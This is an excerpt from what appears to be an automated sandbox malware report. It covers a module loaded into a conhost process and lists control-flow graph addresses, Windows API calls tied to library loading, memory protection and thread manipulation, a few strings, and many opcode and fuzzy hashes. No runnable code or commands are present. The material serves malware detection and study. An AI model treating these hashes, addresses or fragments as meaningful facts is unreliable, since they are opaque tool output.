                              control_flow_graph 452 2bcd7e37c50-2bcd7e37c56 453 2bcd7e37c91-2bcd7e37c9b 452->453 454 2bcd7e37c58-2bcd7e37c5b 452->454 455 2bcd7e37db8-2bcd7e37dcd 453->455 456 2bcd7e37c5d-2bcd7e37c60 454->456 457 2bcd7e37c85-2bcd7e37cc4 call 2bcd7e382f0 454->457 461 2bcd7e37dcf 455->461 462 2bcd7e37ddc-2bcd7e37df6 call 2bcd7e38184 455->462 459 2bcd7e37c62-2bcd7e37c65 456->459 460 2bcd7e37c78 __scrt_dllmain_crt_thread_attach 456->460 474 2bcd7e37d92 457->474 475 2bcd7e37cca-2bcd7e37cdf call 2bcd7e38184 457->475 465 2bcd7e37c71-2bcd7e37c76 call 2bcd7e38234 459->465 466 2bcd7e37c67-2bcd7e37c70 459->466 463 2bcd7e37c7d-2bcd7e37c84 460->463 467 2bcd7e37dd1-2bcd7e37ddb 461->467 472 2bcd7e37e2b-2bcd7e37e5c call 2bcd7e384b0 462->472 473 2bcd7e37df8-2bcd7e37e29 call 2bcd7e382ac call 2bcd7e3814c call 2bcd7e38634 call 2bcd7e38450 call 2bcd7e38474 call 2bcd7e382dc 462->473 465->463 484 2bcd7e37e5e-2bcd7e37e64 472->484 485 2bcd7e37e6d-2bcd7e37e73 472->485 473->467 478 2bcd7e37d94-2bcd7e37da9 474->478 487 2bcd7e37ce5-2bcd7e37cf6 call 2bcd7e381f4 475->487 488 2bcd7e37daa-2bcd7e37db7 call 2bcd7e384b0 475->488 484->485 489 2bcd7e37e66-2bcd7e37e68 484->489 490 2bcd7e37eb5-2bcd7e37ecb call 2bcd7e33a1c 485->490 491 2bcd7e37e75-2bcd7e37e7f 485->491 504 2bcd7e37d47-2bcd7e37d51 call 2bcd7e38450 487->504 505 2bcd7e37cf8-2bcd7e37d1c call 2bcd7e385f8 call 2bcd7e3813c call 2bcd7e38168 call 2bcd7e3b428 487->505 488->455 495 2bcd7e37f52-2bcd7e37f5f 489->495 513 2bcd7e37ecd-2bcd7e37ecf 490->513 514 2bcd7e37f03-2bcd7e37f05 490->514 496 2bcd7e37e81-2bcd7e37e84 491->496 497 2bcd7e37e86-2bcd7e37e8c 491->497 502 2bcd7e37e8e-2bcd7e37e94 496->502 497->502 509 2bcd7e37e9a-2bcd7e37eaf call 2bcd7e37c50 502->509 510 2bcd7e37f48-2bcd7e37f50 502->510 504->474 527 2bcd7e37d53-2bcd7e37d5f call 2bcd7e384a0 504->527 505->504 554 2bcd7e37d1e-2bcd7e37d25 __scrt_dllmain_after_initialize_c 505->554 509->490 509->510 510->495 513->514 515 2bcd7e37ed1-2bcd7e37ef3 call 2bcd7e33a1c call 2bcd7e37db8 513->515 518 2bcd7e37f0c-2bcd7e37f21 call 2bcd7e37c50 514->518 519 2bcd7e37f07-2bcd7e37f0a 514->519 515->514 548 2bcd7e37ef5-2bcd7e37efa 515->548 518->510 537 2bcd7e37f23-2bcd7e37f2d 518->537 519->510 519->518 544 2bcd7e37d61-2bcd7e37d6b call 2bcd7e383b8 527->544 545 2bcd7e37d85-2bcd7e37d90 527->545 542 2bcd7e37f2f-2bcd7e37f32 537->542 543 2bcd7e37f34-2bcd7e37f42 537->543 549 2bcd7e37f44 542->549 543->549 544->545 553 2bcd7e37d6d-2bcd7e37d7b 544->553 545->478 548->514 549->510 553->545 554->504 555 2bcd7e37d27-2bcd7e37d44 call 2bcd7e3b3f0 554->555 555->504
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: c4fefd4a9d3c06707a3a3fb2b5b4426dd8c89961196979cb3eda7697a403f6e3
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: 8281F53C6006674EFB90ABA6948D36973D0BB86786F74413FA94847F96DB38C851C713
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd
                              Similarity
                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 190073905-0
                              • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction ID: e0d48adc6b46b274f3ad1194b3122bad59a2ce4ed3fe266ccf5e360902ee3dda
                              • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                              • Instruction Fuzzy Hash: A181B0786002634EFE54AB65984E39973D1AB86780F74413FAD4947FD6DB38C846C743

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 558 2bcd7e39aac-2bcd7e39aea 559 2bcd7e39b9e 558->559 560 2bcd7e39af0-2bcd7e39af3 558->560 561 2bcd7e39ba0-2bcd7e39bbc 559->561 560->561 562 2bcd7e39af9-2bcd7e39afc 560->562 563 2bcd7e39b02-2bcd7e39b11 562->563 564 2bcd7e39b96 562->564 565 2bcd7e39b1e-2bcd7e39b3d LoadLibraryExW 563->565 566 2bcd7e39b13-2bcd7e39b16 563->566 564->559 569 2bcd7e39b3f-2bcd7e39b48 GetLastError 565->569 570 2bcd7e39bbd-2bcd7e39bd2 565->570 567 2bcd7e39bdd-2bcd7e39bec GetProcAddress 566->567 568 2bcd7e39b1c 566->568 567->564 572 2bcd7e39bee-2bcd7e39bf9 567->572 573 2bcd7e39b89-2bcd7e39b90 568->573 574 2bcd7e39b77-2bcd7e39b81 569->574 575 2bcd7e39b4a-2bcd7e39b5f call 2bcd7e3c4d8 569->575 570->567 571 2bcd7e39bd4-2bcd7e39bd7 FreeLibrary 570->571 571->567 572->561 573->563 573->564 574->573 575->574 578 2bcd7e39b61-2bcd7e39b75 LoadLibraryExW 575->578 578->570 578->574
                              APIs
                              • LoadLibraryExW.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39B31
                              • GetLastError.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39B3F
                              • LoadLibraryExW.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39B69
                              • FreeLibrary.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39BD7
                              • GetProcAddress.KERNEL32(?,?,?,000002BCD7E39C6B,?,?,?,000002BCD7E3945C,?,?,?,?,000002BCD7E38F65), ref: 000002BCD7E39BE3
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Library$Load$AddressErrorFreeLastProc
                              • String ID: api-ms-
                              • API String ID: 2559590344-2084034818
                              • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction ID: 60601e00f3237b0bc8c7e55f3a8f0e3b762862db94274aadd299469441c58cb3
                              • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                              • Instruction Fuzzy Hash: D731A13A312A42D9EE119B06A8087A533D4BB44BA9F69063EED1D4BF90EF38C454C756
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                              • String ID: CONOUT$
                              • API String ID: 3230265001-3130406586
                              • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction ID: 1f58a137a26dd54c8740bc9b7f87a824de14f3104c5429cb43184a53cffee3f9
                              • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                              • Instruction Fuzzy Hash: CD119039310B418AE7508B52E85871977A0F388BE8F60023EEA5E87F94DF38C424C781
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Thread$Current$Context
                              • String ID:
                              • API String ID: 1666949209-0
                              • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction ID: 4cd9e032b4e0d69a99e38f62031084f7f4bc6945d93e2c67aea9160a9a0311f7
                              • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                              • Instruction Fuzzy Hash: 44D17C7A204B8985DA709B1AE49835A77B0F7C8B99F60013BEA8D47F69DF3CC551CB01
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Free$CurrentThread
                              • String ID:
                              • API String ID: 564911740-0
                              • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction ID: 8e88c89f4f8d762ac4a8665fb1c54bd48459f249f499404db27d36363f4cfd8b
                              • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                              • Instruction Fuzzy Hash: 27511738201B479DEB09DB25E85929433A5FB0474AFA0093FE56D46FA5EF38D528C382
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocFree
                              • String ID: $rbx-
                              • API String ID: 756756679-3661604363
                              • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction ID: 2869eaaf50e9d2ee6512ec1e9ef8a2db4943dded60aae236ae8549e79e0a6c69
                              • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                              • Instruction Fuzzy Hash: 44319D3A701B528FEB14DF16A548B69B3A0FB44B85F29403A8F4947F66EF34C4A1C741
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: ErrorLast$Value$FreeHeap
                              • String ID:
                              • API String ID: 365477584-0
                              • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction ID: 4d07f44c437271609310e48c7e8f39896cb90feb090f81c3f1fef6d4e83ea818
                              • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                              • Instruction Fuzzy Hash: BB11A33E3002438AFA14A735681D76E3351AB84796FB4463FAC2656FDADF38C411D302
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                              • String ID:
                              • API String ID: 517849248-0
                              • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction ID: 3c626c01ed5105cbca0764bbcf99d8b04cdffb0cef5e23ae80935f7ef83dd366
                              • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                              • Instruction Fuzzy Hash: 5E011B39704A428AEB14DB12A85C35973A1F788FC9F68403EDE5D83B54DF38C995C781
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                              • String ID:
                              • API String ID: 449555515-0
                              • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction ID: 2aab8e0c98c76cbce2429163464a57b4e109f7f2382b7a149ad51ba9107b5028
                              • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                              • Instruction Fuzzy Hash: 1001297D311B468AFB249B22E84D71973A0BB49B89F24013ECA4D46BA5EF3DC458C742
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: FinalHandleNamePathlstrlen
                              • String ID: \\?\
                              • API String ID: 2719912262-4282027825
                              • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction ID: b7f28dc4912f6816da8f02aa0178d798d45a77eda66e571749e142fd4775e8e1
                              • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction Fuzzy Hash: 97F04F76304A86D6EB208B21F9883597361F744BCDF94403EDA4986E58EF7CC698CB41
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CombinePath
                              • String ID: \\.\pipe\
                              • API String ID: 3422762182-91387939
                              • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction ID: 0265d7062be8b1faad17728ab802dd56e5be354f5276cc7d0bbc982bf4632ee7
                              • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction Fuzzy Hash: ABF08278304B8285FA048B13B91811A7360BB48FC5F64813AEE0A07F2DDF3CC455C741
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction ID: 915dcd958dc97400fba72f66c38c8ff6aecd60548ebd790ab5015dee4a767f44
                              • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction Fuzzy Hash: CDF0903930060289EB148B24A88D3693330EB89769F64023FDA6A45EE4DF3CC458C742
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction ID: 6800e9a7a9467c98d7a479bb0e556bb3751c53812f5bc90549705bd2a1371158
                              • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction Fuzzy Hash: 50020D36219B858AE7A0CB15F49535AB7A0F3C4795F20013AEA8E87FA8DF7CD444CB41
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction ID: 4a91fa9797349b87b653db1094adbcb0a8b339cca98ab1039e704a5aa5b74b23
                              • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction Fuzzy Hash: E451A43A6046428FE765CB16E448A5AB3A4F788B85FB4413EDE8A83F54DF39C845CB41
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction ID: 25dcfc89930cb48d422d3afdcb38ff3c593449d5aa15ea036552490bd4de1c69
                              • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction Fuzzy Hash: F15161396146428FE728CF26E84865AB3A5F788B85F60413EDE8A43F54DF39D845CB41
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction ID: 1f1241abc97eb049bb6d7761b9860d50986b40b332df65043196c62b4003bc8f
                              • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction Fuzzy Hash: 1161CB3A129B45CAE7608B25E49931AB7E1F388745F60013AFA8D47FA8DB7CD550CF42
                              APIs
                              Memory Dump Source
                              • Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true
                              • Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
